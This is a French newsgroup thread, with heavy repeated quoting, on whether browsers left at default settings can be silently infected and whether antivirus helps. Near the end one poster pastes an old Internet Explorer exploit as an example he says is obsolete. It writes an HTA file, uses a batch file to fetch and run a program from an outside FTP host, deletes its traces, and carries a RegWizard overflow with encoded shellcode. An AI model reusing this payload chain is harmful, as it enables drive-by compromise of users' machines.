"Luc" a écrit dans le message
de news:4c8a9f0e$0$31716$
Tout au plus qu'ils prêchent pour leur paroisse. Rien de plus normal
au demeurant, mais c'est pour bien mettre en perspective le contenu
du lien.
Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des
phenomenes reels contre lesquels leurs outils proposent de proteger ?
Car si tu as regardé le petit topo que j'ai mis en lien il y est
clairement annoncé : "Sometimes you need only access a webpage with
a flawed browser" Tout ets dans le Flawed bien sur... (defectueux)
Ce n'est pas pour autant qu'ils sont vulnérables. Mais c'est dommage
que tu ne répondes qu'à l'accessoire et que tu aies "oublié" la
majeure partie et l'essentiel de mon intervention qui traitait de
cela.
?
Je n'ai rien oublié du tout. Pourquoi prends tu la mouche ?
Je la cite pour rappel :
"[...]Pour la très grande majorité des internautes, le PC est un
outil, pas une
fin. Ils installent un logiciel et l'utilisent dans sa configuration
par défaut, point ! Parmi les rares qui fouillent dans les options
de leur navigateur, la plupart renforcent les paramètres de sécurité
aux risques, d'ailleurs de se trouver incapables d'ouvrir certaines
pages anodines, vidéos, .... Seuls quelques maladroits, une infime
minorité donc, vont faire
sauter des paramètres essentiels pour la sécurité. Ce sont de toute
façon les mêmes qui installeront le premier programme qui leur
promettra des photos de Haris Pilton à poil lors de leur surf sur
des sites pornographiques, quitte à ignorer obstinément les messages
d'avertissement de leur navigateur et/ou de leur antivirus. [...]"
Oui j'avais bien lu la meme chose. Mais je ne vois pas ce que cela
change. "Les utilisateurs (...) utilisent dans la configuration par
défaut", oui c'est vrai. Mais cette config par defaut n'est pas
immuable, c'ets sur ce point que je donne mon avis.
La partie sur ceux qui renforcent, je ne suis pas entré dedans, car
c'eut été pour te completer en rappellant que certains le font dans
l'autre sens : reduire les messages d'alertes et les blocages.
Mais ca n'apporte rien sur le sujet principal : les infections
silencieuses par simple visite d'une page web qui à été
piegée/compromise par injection de script et ce, même sur des sites
"officiels".
Exemple celui de la CAF
Pourquoi pas, mais là c'est ce serait un environnement qui n'a
vraiment plus rien à voir avec un environnement "par défaut". Et
donc, tu confirmes, toujours implicitement ;-) ce que je dis depuis
le début.
Si tu veux que je "te" confirme, je veux bien moi, ca ne me coute
rien. :-) Mais ce que j'evoque c'est avant tout la realité
quotidienne des machines des utilisateurs sur lesquelles on retrouve
des parametres de securite de IE (pour ne prendre que cela puisque
c'ets le sujet que tu souleves) qui ne sont plus "par defaut" mais
amoindries,
laissant ainsi plus facilement passé un script là ou,
sans cette "faille", un message d'avertissement apparaitrait a
l'utilisateur pour lui permettre de reflechir (sans garanti de
succes). On a le meme principe avec Vista et son UAC agacante que certains
(MVP meme !!) ont conseillés partout de desactiver :-/
Si tu le dis ! ;-)
oui, je le dis car je suis honnete. Mais ca ne signifie pas non plus
que j'ai raison de mettre le doute sur moi meme plutot que sur la
visite d'un site pourtant annodin, mais compromis et que je serais
allé visité avant qu'il n'ait été corrigé.
Remarque que si je n'ai pas d'antivirus, je n'incite personne à en
faire autant. Je ne laisserais pas un PC destiné à un ado bourré
d'hormones sans antivirus (le PC pas l'ado) par exemple...
Quoique... Des fois, j'en arrive à me demander si c'est utile. J'ai
eu l'occasion de démerdouiller des PC d'ados de cet acabit avec
antivirus de bonne facture, je n'ose même pas te décrire l'état !
Des sacs à vérolewares ! Inimaginable !
Un AV ne peut rien quand il avertit et recoit une fin de non recevoir.
Comme le cas de Pare feu type ZA, qui ont une liste de regles
d'autorisation pour chaque malware que l'utilisateur a rencontré mais
pour lesquels, n'y comprenant pas vraiment grand chose sauf que "si
il bloque ca marche plus", il a cliqué sur "Autoriser"...
C'est vrai que parfois on se demande s'il est bien utile de mettre une
quelconque protection. c'est aussi pour cela que certains produits,
bloquent ou supprimment sans donner la main a l'utilisateur sur le
choix a faire.
Luc Burnouf
http://www.faqoe.com/
ok ;-)
"Luc" <robottest.inv@netcourrier.com.invalid> a écrit dans le message
de news:4c8a9f0e$0$31716$426a74cc@news.free.fr...
Tout au plus qu'ils prêchent pour leur paroisse. Rien de plus normal
au demeurant, mais c'est pour bien mettre en perspective le contenu
du lien.
Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des
phenomenes reels contre lesquels leurs outils proposent de proteger ?
Car si tu as regardé le petit topo que j'ai mis en lien il y est
clairement annoncé : "Sometimes you need only access a webpage with
a flawed browser" Tout ets dans le Flawed bien sur... (defectueux)
Ce n'est pas pour autant qu'ils sont vulnérables. Mais c'est dommage
que tu ne répondes qu'à l'accessoire et que tu aies "oublié" la
majeure partie et l'essentiel de mon intervention qui traitait de
cela.
?
Je n'ai rien oublié du tout. Pourquoi prends tu la mouche ?
Je la cite pour rappel :
"[...]Pour la très grande majorité des internautes, le PC est un
outil, pas une
fin. Ils installent un logiciel et l'utilisent dans sa configuration
par défaut, point ! Parmi les rares qui fouillent dans les options
de leur navigateur, la plupart renforcent les paramètres de sécurité
aux risques, d'ailleurs de se trouver incapables d'ouvrir certaines
pages anodines, vidéos, .... Seuls quelques maladroits, une infime
minorité donc, vont faire
sauter des paramètres essentiels pour la sécurité. Ce sont de toute
façon les mêmes qui installeront le premier programme qui leur
promettra des photos de Haris Pilton à poil lors de leur surf sur
des sites pornographiques, quitte à ignorer obstinément les messages
d'avertissement de leur navigateur et/ou de leur antivirus. [...]"
Oui j'avais bien lu la meme chose. Mais je ne vois pas ce que cela
change. "Les utilisateurs (...) utilisent dans la configuration par
défaut", oui c'est vrai. Mais cette config par defaut n'est pas
immuable, c'ets sur ce point que je donne mon avis.
La partie sur ceux qui renforcent, je ne suis pas entré dedans, car
c'eut été pour te completer en rappellant que certains le font dans
l'autre sens : reduire les messages d'alertes et les blocages.
Mais ca n'apporte rien sur le sujet principal : les infections
silencieuses par simple visite d'une page web qui à été
piegée/compromise par injection de script et ce, même sur des sites
"officiels".
Exemple celui de la CAF
Pourquoi pas, mais là c'est ce serait un environnement qui n'a
vraiment plus rien à voir avec un environnement "par défaut". Et
donc, tu confirmes, toujours implicitement ;-) ce que je dis depuis
le début.
Si tu veux que je "te" confirme, je veux bien moi, ca ne me coute
rien. :-) Mais ce que j'evoque c'est avant tout la realité
quotidienne des machines des utilisateurs sur lesquelles on retrouve
des parametres de securite de IE (pour ne prendre que cela puisque
c'ets le sujet que tu souleves) qui ne sont plus "par defaut" mais
amoindries,
laissant ainsi plus facilement passé un script là ou,
sans cette "faille", un message d'avertissement apparaitrait a
l'utilisateur pour lui permettre de reflechir (sans garanti de
succes). On a le meme principe avec Vista et son UAC agacante que certains
(MVP meme !!) ont conseillés partout de desactiver :-/
Si tu le dis ! ;-)
oui, je le dis car je suis honnete. Mais ca ne signifie pas non plus
que j'ai raison de mettre le doute sur moi meme plutot que sur la
visite d'un site pourtant annodin, mais compromis et que je serais
allé visité avant qu'il n'ait été corrigé.
Remarque que si je n'ai pas d'antivirus, je n'incite personne à en
faire autant. Je ne laisserais pas un PC destiné à un ado bourré
d'hormones sans antivirus (le PC pas l'ado) par exemple...
Quoique... Des fois, j'en arrive à me demander si c'est utile. J'ai
eu l'occasion de démerdouiller des PC d'ados de cet acabit avec
antivirus de bonne facture, je n'ose même pas te décrire l'état !
Des sacs à vérolewares ! Inimaginable !
Un AV ne peut rien quand il avertit et recoit une fin de non recevoir.
Comme le cas de Pare feu type ZA, qui ont une liste de regles
d'autorisation pour chaque malware que l'utilisateur a rencontré mais
pour lesquels, n'y comprenant pas vraiment grand chose sauf que "si
il bloque ca marche plus", il a cliqué sur "Autoriser"...
C'est vrai que parfois on se demande s'il est bien utile de mettre une
quelconque protection. c'est aussi pour cela que certains produits,
bloquent ou supprimment sans donner la main a l'utilisateur sur le
choix a faire.
Luc Burnouf
http://www.faqoe.com/
ok ;-)
"Luc" a écrit dans le message
de news:4c8a9f0e$0$31716$
Tout au plus qu'ils prêchent pour leur paroisse. Rien de plus normal
au demeurant, mais c'est pour bien mettre en perspective le contenu
du lien.
Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des
phenomenes reels contre lesquels leurs outils proposent de proteger ?
Car si tu as regardé le petit topo que j'ai mis en lien il y est
clairement annoncé : "Sometimes you need only access a webpage with
a flawed browser" Tout ets dans le Flawed bien sur... (defectueux)
Ce n'est pas pour autant qu'ils sont vulnérables. Mais c'est dommage
que tu ne répondes qu'à l'accessoire et que tu aies "oublié" la
majeure partie et l'essentiel de mon intervention qui traitait de
cela.
?
Je n'ai rien oublié du tout. Pourquoi prends tu la mouche ?
Je la cite pour rappel :
"[...]Pour la très grande majorité des internautes, le PC est un
outil, pas une
fin. Ils installent un logiciel et l'utilisent dans sa configuration
par défaut, point ! Parmi les rares qui fouillent dans les options
de leur navigateur, la plupart renforcent les paramètres de sécurité
aux risques, d'ailleurs de se trouver incapables d'ouvrir certaines
pages anodines, vidéos, .... Seuls quelques maladroits, une infime
minorité donc, vont faire
sauter des paramètres essentiels pour la sécurité. Ce sont de toute
façon les mêmes qui installeront le premier programme qui leur
promettra des photos de Haris Pilton à poil lors de leur surf sur
des sites pornographiques, quitte à ignorer obstinément les messages
d'avertissement de leur navigateur et/ou de leur antivirus. [...]"
Oui j'avais bien lu la meme chose. Mais je ne vois pas ce que cela
change. "Les utilisateurs (...) utilisent dans la configuration par
défaut", oui c'est vrai. Mais cette config par defaut n'est pas
immuable, c'ets sur ce point que je donne mon avis.
La partie sur ceux qui renforcent, je ne suis pas entré dedans, car
c'eut été pour te completer en rappellant que certains le font dans
l'autre sens : reduire les messages d'alertes et les blocages.
Mais ca n'apporte rien sur le sujet principal : les infections
silencieuses par simple visite d'une page web qui à été
piegée/compromise par injection de script et ce, même sur des sites
"officiels".
Exemple celui de la CAF
Pourquoi pas, mais là c'est ce serait un environnement qui n'a
vraiment plus rien à voir avec un environnement "par défaut". Et
donc, tu confirmes, toujours implicitement ;-) ce que je dis depuis
le début.
Si tu veux que je "te" confirme, je veux bien moi, ca ne me coute
rien. :-) Mais ce que j'evoque c'est avant tout la realité
quotidienne des machines des utilisateurs sur lesquelles on retrouve
des parametres de securite de IE (pour ne prendre que cela puisque
c'ets le sujet que tu souleves) qui ne sont plus "par defaut" mais
amoindries,
laissant ainsi plus facilement passé un script là ou,
sans cette "faille", un message d'avertissement apparaitrait a
l'utilisateur pour lui permettre de reflechir (sans garanti de
succes). On a le meme principe avec Vista et son UAC agacante que certains
(MVP meme !!) ont conseillés partout de desactiver :-/
Si tu le dis ! ;-)
oui, je le dis car je suis honnete. Mais ca ne signifie pas non plus
que j'ai raison de mettre le doute sur moi meme plutot que sur la
visite d'un site pourtant annodin, mais compromis et que je serais
allé visité avant qu'il n'ait été corrigé.
Remarque que si je n'ai pas d'antivirus, je n'incite personne à en
faire autant. Je ne laisserais pas un PC destiné à un ado bourré
d'hormones sans antivirus (le PC pas l'ado) par exemple...
Quoique... Des fois, j'en arrive à me demander si c'est utile. J'ai
eu l'occasion de démerdouiller des PC d'ados de cet acabit avec
antivirus de bonne facture, je n'ose même pas te décrire l'état !
Des sacs à vérolewares ! Inimaginable !
Un AV ne peut rien quand il avertit et recoit une fin de non recevoir.
Comme le cas de Pare feu type ZA, qui ont une liste de regles
d'autorisation pour chaque malware que l'utilisateur a rencontré mais
pour lesquels, n'y comprenant pas vraiment grand chose sauf que "si
il bloque ca marche plus", il a cliqué sur "Autoriser"...
C'est vrai que parfois on se demande s'il est bien utile de mettre une
quelconque protection. c'est aussi pour cela que certains produits,
bloquent ou supprimment sans donner la main a l'utilisateur sur le
choix a faire.
Luc Burnouf
http://www.faqoe.com/
ok ;-)
Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des phenomenes
reels contre lesquels leurs outils proposent de proteger ? Car si tu as
regardé le petit topo que j'ai mis en lien il y est clairement annoncé
: "Sometimes you need only access a webpage with a flawed browser"
Tout ets dans le Flawed bien sur... (defectueux)
Ce qui ne signifie pas grand chose et en tout cas pas qu'un navigateur
par défaut puisse être infecté silencieusement.
Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des phenomenes
reels contre lesquels leurs outils proposent de proteger ? Car si tu as
regardé le petit topo que j'ai mis en lien il y est clairement annoncé
: "Sometimes you need only access a webpage with a flawed browser"
Tout ets dans le Flawed bien sur... (defectueux)
Ce qui ne signifie pas grand chose et en tout cas pas qu'un navigateur
par défaut puisse être infecté silencieusement.
Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des phenomenes
reels contre lesquels leurs outils proposent de proteger ? Car si tu as
regardé le petit topo que j'ai mis en lien il y est clairement annoncé
: "Sometimes you need only access a webpage with a flawed browser"
Tout ets dans le Flawed bien sur... (defectueux)
Ce qui ne signifie pas grand chose et en tout cas pas qu'un navigateur
par défaut puisse être infecté silencieusement.
Az Sam a écrit...Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des
phenomenes reels contre lesquels leurs outils proposent de proteger ?
Car si tu as regardé le petit topo que j'ai mis en lien il y est
clairement annoncé : "Sometimes you need only access a webpage with
a flawed browser" Tout ets dans le Flawed bien sur... (defectueux)
Ce qui ne signifie pas grand chose et en tout cas pas qu'un navigateur par
défaut puisse être infecté silencieusement.
Je ne prends pas la mouche, je note seulement que tu as bien "oublié"
l'essentiel de mon intervention et c'est pourquoi je l'ai cité.
C'est évident que si tu prends pour principe puisse être paramétré
n'importe comment, tu peux prévoir n'importe quelle avanie, et donc, une
fois que tu as dis ça, tu n'as rien dit. J'ai bien toujours précisé comme
condition minimale "navigateur paramétré par défaut".
Exemple celui de la CAF
La CAF infecte silencieusement les navigateurs paramétrés par défaut. Ça
fout la trouille.
Mais c'est toi qui l'affirmes mais ce n'est pas vrai (je ne vais pas
reciter la réponse que je t'ai faite à ce sujet, n'est-ce pas ?)
et quoi qu'il en soit, il n'en reste pas moins vrai qu'un navigateur par
défaut ne peut être vérolé silencieusement sans la complicité active de
l'utilisateur.
Non, ce n'est pas du tout comparable. L'UAC est agaçant pour l'utilisateur
un peu "geek" qui installe, désintalle, fouille beaucoup est trop souvent
mis en garde par ce contrôle du compte utilisateur. L'utilisateur "de
base" qui se sert de son PC comme d'un outil ne verra qu'une poignée de
rappels de l'UAC au début de l'installation de son PC quand il installera
ses logiciels préférés, il n'aura pas le temps de s'agacer, par la suite,
il n'en verra plus.
Pour ce qui concerne les paramètres de sécurité des navigateurs, le niveau
par défaut permet d'aller et de voir ce qu'on veut sur la toile dans
99,99% des lieux, l'utilisateur "de base" (je n'aime pas trop cette
expression mais bon, on se comprend) n'a jamais lieu d'aller y
farfouiller.
C'est dommage car tu aurais noté, j'en suis sûr le site en question et
enfin mon attente de plus de dix ans serait rompue ! ;-)
Personnellement, j'aime bien la méthode "éducative" plutôt
qu'"interdictive".
Je *montre* l'ennemi en face, on combat mieux son ennemi quand on le
connaît. J'ai une bordée de mails avec PJ vérolées, je montre leur
tronche, leurs caractérisques. Ce n'est pas bien difficile de les repérer
avec leurs gros sabots. On voit très bien aussi que le danger, c'est n'est
pas de voir, mais d'installer (comme pour le surf en somme, on y revient !
;-) ), seule la PJ est infectante si on l'installe et ça, c'est
l'utilisateur qui peut le faire, personne d'autre.
On peut montrer aussi les dangers du surf, j'ai déjà parlé par exemple des
visites en des lieux malfamés qui proposent des logiciels promettant des
photos de Haris Pilton à poil devant Pris, on trouve aussi assez
facilement des liens qui t'annoncent tout de go que ton PC est pourri de
centaines de conchonneries et te proposent, des pseudo antivirus qui sont
de vrais rogues, etc, etc.
Bref, en une heure tout au plus, on peut montrer à une personne responsable
les pièges tellement facile à éviter que ça vaut parfois mieux que la
fausse impression de sécurité que donne la foison d'outils de sécurité qui
ne fait que baisser le niveau de vigilance et le bon sens de l'utilisateur.
Az Sam a écrit...
Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des
phenomenes reels contre lesquels leurs outils proposent de proteger ?
Car si tu as regardé le petit topo que j'ai mis en lien il y est
clairement annoncé : "Sometimes you need only access a webpage with
a flawed browser" Tout ets dans le Flawed bien sur... (defectueux)
Ce qui ne signifie pas grand chose et en tout cas pas qu'un navigateur par
défaut puisse être infecté silencieusement.
Je ne prends pas la mouche, je note seulement que tu as bien "oublié"
l'essentiel de mon intervention et c'est pourquoi je l'ai cité.
C'est évident que si tu prends pour principe puisse être paramétré
n'importe comment, tu peux prévoir n'importe quelle avanie, et donc, une
fois que tu as dis ça, tu n'as rien dit. J'ai bien toujours précisé comme
condition minimale "navigateur paramétré par défaut".
Exemple celui de la CAF
La CAF infecte silencieusement les navigateurs paramétrés par défaut. Ça
fout la trouille.
Mais c'est toi qui l'affirmes mais ce n'est pas vrai (je ne vais pas
reciter la réponse que je t'ai faite à ce sujet, n'est-ce pas ?)
et quoi qu'il en soit, il n'en reste pas moins vrai qu'un navigateur par
défaut ne peut être vérolé silencieusement sans la complicité active de
l'utilisateur.
Non, ce n'est pas du tout comparable. L'UAC est agaçant pour l'utilisateur
un peu "geek" qui installe, désintalle, fouille beaucoup est trop souvent
mis en garde par ce contrôle du compte utilisateur. L'utilisateur "de
base" qui se sert de son PC comme d'un outil ne verra qu'une poignée de
rappels de l'UAC au début de l'installation de son PC quand il installera
ses logiciels préférés, il n'aura pas le temps de s'agacer, par la suite,
il n'en verra plus.
Pour ce qui concerne les paramètres de sécurité des navigateurs, le niveau
par défaut permet d'aller et de voir ce qu'on veut sur la toile dans
99,99% des lieux, l'utilisateur "de base" (je n'aime pas trop cette
expression mais bon, on se comprend) n'a jamais lieu d'aller y
farfouiller.
C'est dommage car tu aurais noté, j'en suis sûr le site en question et
enfin mon attente de plus de dix ans serait rompue ! ;-)
Personnellement, j'aime bien la méthode "éducative" plutôt
qu'"interdictive".
Je *montre* l'ennemi en face, on combat mieux son ennemi quand on le
connaît. J'ai une bordée de mails avec PJ vérolées, je montre leur
tronche, leurs caractérisques. Ce n'est pas bien difficile de les repérer
avec leurs gros sabots. On voit très bien aussi que le danger, c'est n'est
pas de voir, mais d'installer (comme pour le surf en somme, on y revient !
;-) ), seule la PJ est infectante si on l'installe et ça, c'est
l'utilisateur qui peut le faire, personne d'autre.
On peut montrer aussi les dangers du surf, j'ai déjà parlé par exemple des
visites en des lieux malfamés qui proposent des logiciels promettant des
photos de Haris Pilton à poil devant Pris, on trouve aussi assez
facilement des liens qui t'annoncent tout de go que ton PC est pourri de
centaines de conchonneries et te proposent, des pseudo antivirus qui sont
de vrais rogues, etc, etc.
Bref, en une heure tout au plus, on peut montrer à une personne responsable
les pièges tellement facile à éviter que ça vaut parfois mieux que la
fausse impression de sécurité que donne la foison d'outils de sécurité qui
ne fait que baisser le niveau de vigilance et le bon sens de l'utilisateur.
Az Sam a écrit...Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des
phenomenes reels contre lesquels leurs outils proposent de proteger ?
Car si tu as regardé le petit topo que j'ai mis en lien il y est
clairement annoncé : "Sometimes you need only access a webpage with
a flawed browser" Tout ets dans le Flawed bien sur... (defectueux)
Ce qui ne signifie pas grand chose et en tout cas pas qu'un navigateur par
défaut puisse être infecté silencieusement.
Je ne prends pas la mouche, je note seulement que tu as bien "oublié"
l'essentiel de mon intervention et c'est pourquoi je l'ai cité.
C'est évident que si tu prends pour principe puisse être paramétré
n'importe comment, tu peux prévoir n'importe quelle avanie, et donc, une
fois que tu as dis ça, tu n'as rien dit. J'ai bien toujours précisé comme
condition minimale "navigateur paramétré par défaut".
Exemple celui de la CAF
La CAF infecte silencieusement les navigateurs paramétrés par défaut. Ça
fout la trouille.
Mais c'est toi qui l'affirmes mais ce n'est pas vrai (je ne vais pas
reciter la réponse que je t'ai faite à ce sujet, n'est-ce pas ?)
et quoi qu'il en soit, il n'en reste pas moins vrai qu'un navigateur par
défaut ne peut être vérolé silencieusement sans la complicité active de
l'utilisateur.
Non, ce n'est pas du tout comparable. L'UAC est agaçant pour l'utilisateur
un peu "geek" qui installe, désintalle, fouille beaucoup est trop souvent
mis en garde par ce contrôle du compte utilisateur. L'utilisateur "de
base" qui se sert de son PC comme d'un outil ne verra qu'une poignée de
rappels de l'UAC au début de l'installation de son PC quand il installera
ses logiciels préférés, il n'aura pas le temps de s'agacer, par la suite,
il n'en verra plus.
Pour ce qui concerne les paramètres de sécurité des navigateurs, le niveau
par défaut permet d'aller et de voir ce qu'on veut sur la toile dans
99,99% des lieux, l'utilisateur "de base" (je n'aime pas trop cette
expression mais bon, on se comprend) n'a jamais lieu d'aller y
farfouiller.
C'est dommage car tu aurais noté, j'en suis sûr le site en question et
enfin mon attente de plus de dix ans serait rompue ! ;-)
Personnellement, j'aime bien la méthode "éducative" plutôt
qu'"interdictive".
Je *montre* l'ennemi en face, on combat mieux son ennemi quand on le
connaît. J'ai une bordée de mails avec PJ vérolées, je montre leur
tronche, leurs caractérisques. Ce n'est pas bien difficile de les repérer
avec leurs gros sabots. On voit très bien aussi que le danger, c'est n'est
pas de voir, mais d'installer (comme pour le surf en somme, on y revient !
;-) ), seule la PJ est infectante si on l'installe et ça, c'est
l'utilisateur qui peut le faire, personne d'autre.
On peut montrer aussi les dangers du surf, j'ai déjà parlé par exemple des
visites en des lieux malfamés qui proposent des logiciels promettant des
photos de Haris Pilton à poil devant Pris, on trouve aussi assez
facilement des liens qui t'annoncent tout de go que ton PC est pourri de
centaines de conchonneries et te proposent, des pseudo antivirus qui sont
de vrais rogues, etc, etc.
Bref, en une heure tout au plus, on peut montrer à une personne responsable
les pièges tellement facile à éviter que ça vaut parfois mieux que la
fausse impression de sécurité que donne la foison d'outils de sécurité qui
ne fait que baisser le niveau de vigilance et le bon sens de l'utilisateur.
"Luc" a écrit dans le message
de news:4c8b4617$0$9919$Az Sam a écrit...Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des
phenomenes reels contre lesquels leurs outils proposent de proteger
? Car si tu as regardé le petit topo que j'ai mis en lien il y est
clairement annoncé : "Sometimes you need only access a webpage with
a flawed browser" Tout ets dans le Flawed bien sur... (defectueux)
Ce qui ne signifie pas grand chose et en tout cas pas qu'un
navigateur par défaut puisse être infecté silencieusement.
mais pas le contraire non plus on ets bien d'accord.
A moi de te demander pourquoi tu as ignoré la question pour ne
repondre qu'a l'exemple ;-)
Je ne prends pas la mouche, je note seulement que tu as bien "oublié"
l'essentiel de mon intervention et c'est pourquoi je l'ai cité.
si on joue a ca on a pas fini... Passons.
C'est évident que si tu prends pour principe puisse être paramétré
n'importe comment, tu peux prévoir n'importe quelle avanie, et donc,
une fois que tu as dis ça, tu n'as rien dit. J'ai bien toujours
précisé comme condition minimale "navigateur paramétré par défaut".
et moi je te repete : ton cas, outre que tu ne le demontre pas plus
que je ne viens de te le contredire, ne s'applique pas souvent dans
la realité : des naviguateurs mal configurés, ca court les bureaux et
ca court le net...
Exemple celui de la CAF
La CAF infecte silencieusement les navigateurs paramétrés par
défaut. Ça fout la trouille.
ah ben voila.... j'ai pourtant pris la peine de reposter derriere :-(
Adultes responsable disais tu, moi je suis d'accord hein
Mais c'est toi qui l'affirmes mais ce n'est pas vrai (je ne vais pas
reciter la réponse que je t'ai faite à ce sujet, n'est-ce pas ?)
oui j'affirme que les naviguateurs, notement Ie dans notre echange,
ne sont pas toujours configurés avec les options par defaut, car je
croise le cas TRES regulierment dans ma pratique quotidienne.
et quoi qu'il en soit, il n'en reste pas moins vrai qu'un navigateur
par défaut ne peut être vérolé silencieusement sans la complicité
active de l'utilisateur.
ca je me garderais bien de l'affirmer quand meme à defaut de ne
pouvoir dans l'instant te le montrer.
Non, ce n'est pas du tout comparable. L'UAC est agaçant pour
l'utilisateur un peu "geek" qui installe, désintalle, fouille
beaucoup est trop souvent mis en garde par ce contrôle du compte
utilisateur. L'utilisateur "de base" qui se sert de son PC comme
d'un outil ne verra qu'une poignée de rappels de l'UAC au début de
l'installation de son PC quand il installera ses logiciels préférés,
il n'aura pas le temps de s'agacer, par la suite, il n'en verra plus.
Pour ce qui concerne les paramètres de sécurité des navigateurs, le
niveau par défaut permet d'aller et de voir ce qu'on veut sur la
toile dans 99,99% des lieux, l'utilisateur "de base" (je n'aime pas
trop cette expression mais bon, on se comprend) n'a jamais lieu
d'aller y farfouiller.
Mais le "geek" (et meme le non geek, si dans geek on met plus qu'un
neurone servant a jouir) fera aussi ce genre de modification pour
s'eviter des messages d'avertissements de script ou d'activeX ou de
page securisée/non securisée dont il peut se passer du fait de sa
bonne maitrise du net et de sa connaissance approfondie des risques
.(ce geek là, affirme par exemple qu'il surf sans AV, lui)
[note : attention, je ne dis pas que tu es celui la, je rebondis
seulement sur ta propre affirmation que certains reprennent ensuite
pour eux]C'est dommage car tu aurais noté, j'en suis sûr le site en question
et enfin mon attente de plus de dix ans serait rompue ! ;-)
J'ai bien ca, mais c'est tres vieux donc ca ne fonctionne plus (IE4) :
///////////////////////////////////////////////
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
<script>
scr.Path="C:Netmonn.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('command
/c echo ftp -v -i -s:c:\repair.zip
ftp.respublica.fr>>c:\repair.bat',true,1);wsh.Run('command /c echo
stuff.exe>>c:\repair.bat',true,1);wsh.Run('command /c echo deltree
/y c:\repair.zip>>c:\repair.bat',true,1);wsh.Run('command /c
echo deltree /y
c:\Netmonn.hta>>c:\repair.bat',true,1);wsh.Run('command /c echo
deltree /y
c:\repair.bat>>c:\repair.bat',true,1);wsh.Run('command /c echo
kaliko>> c:\Repair.zip',false,6);wsh.Run('command /c echo ZorkZ>>
c:\Repair.zip',false,6);wsh.Run('command /c echo lcd
c:\windows>> c:\Repair.zip',false,6);wsh.Run('command /c echo
binary>> c:\Repair.zip',false,6);wsh.Run('command /c echo get
stuff.exe>> c:\Repair.zip',false,6);wsh.Run('command /c echo
quit>>c:\Repair.zip',false,6);wsh.Run('c:\repair.bat',false,6)</"+"SCRIPT>";scr.write();
</script> <object
classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object> <script language="VbScript" > expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "mshta c:Netmonn.hta"
RegWizObj.InvokeRegWizard(expstr)
////////////////////////////////////////////////////////////////////////////
Les hta n'impliquaient pas de mise en garde de la part du systeme a
cette epoque.Personnellement, j'aime bien la méthode "éducative" plutôt
qu'"interdictive".
moi aussi, mais il y a de nombreux obstacles internes : semantiques,
cognitifs et parfois meme organiques.
et externes : pression comerciale, ingienierie sociale,
complexification.Je *montre* l'ennemi en face, on combat mieux son ennemi quand on le
connaît. J'ai une bordée de mails avec PJ vérolées, je montre leur
tronche, leurs caractérisques. Ce n'est pas bien difficile de les
repérer avec leurs gros sabots. On voit très bien aussi que le
danger, c'est n'est pas de voir, mais d'installer (comme pour le
surf en somme, on y revient ! ;-) ), seule la PJ est infectante si
on l'installe et ça, c'est l'utilisateur qui peut le faire, personne
d'autre.
pour le mail c'est toujours vrai.. quoique là aussi visionner avec
OE5 dans le panneau de visualistaion des mail en html pouvait
permettre l'execution d'un script. Le hta ci dessus etait d'ailleurs
diffusé comme cela si je me souviens bien.
De meme que les reglage "par defaut" du courielleur. Ca lui a valu
une sale reputation qui lui colle encore au basque au point que MS
l'a renommé en Windows Mail sur Vista.
On pourrait aussi soulever les cas des pdf, des jpg, des flash...
forgés.On peut montrer aussi les dangers du surf, j'ai déjà parlé par
exemple des visites en des lieux malfamés qui proposent des
logiciels promettant des photos de Haris Pilton à poil devant Pris,
on trouve aussi assez facilement des liens qui t'annoncent tout de
go que ton PC est pourri de centaines de conchonneries et te
proposent, des pseudo antivirus qui sont de vrais rogues, etc, etc.
les rogues, oui ca pullule.Bref, en une heure tout au plus, on peut montrer à une personne
responsable les pièges tellement facile à éviter que ça vaut parfois
mieux que la fausse impression de sécurité que donne la foison
d'outils de sécurité qui ne fait que baisser le niveau de vigilance
et le bon sens de l'utilisateur.
Le seul bon sens n'est pas suffisant.
La tromperie se sophistique
autant que les langages (HML5 bientôt... brrr) se complexifient.
Sans compter les réseaux sociaux (lit de l'ingienierie sociale) ou le
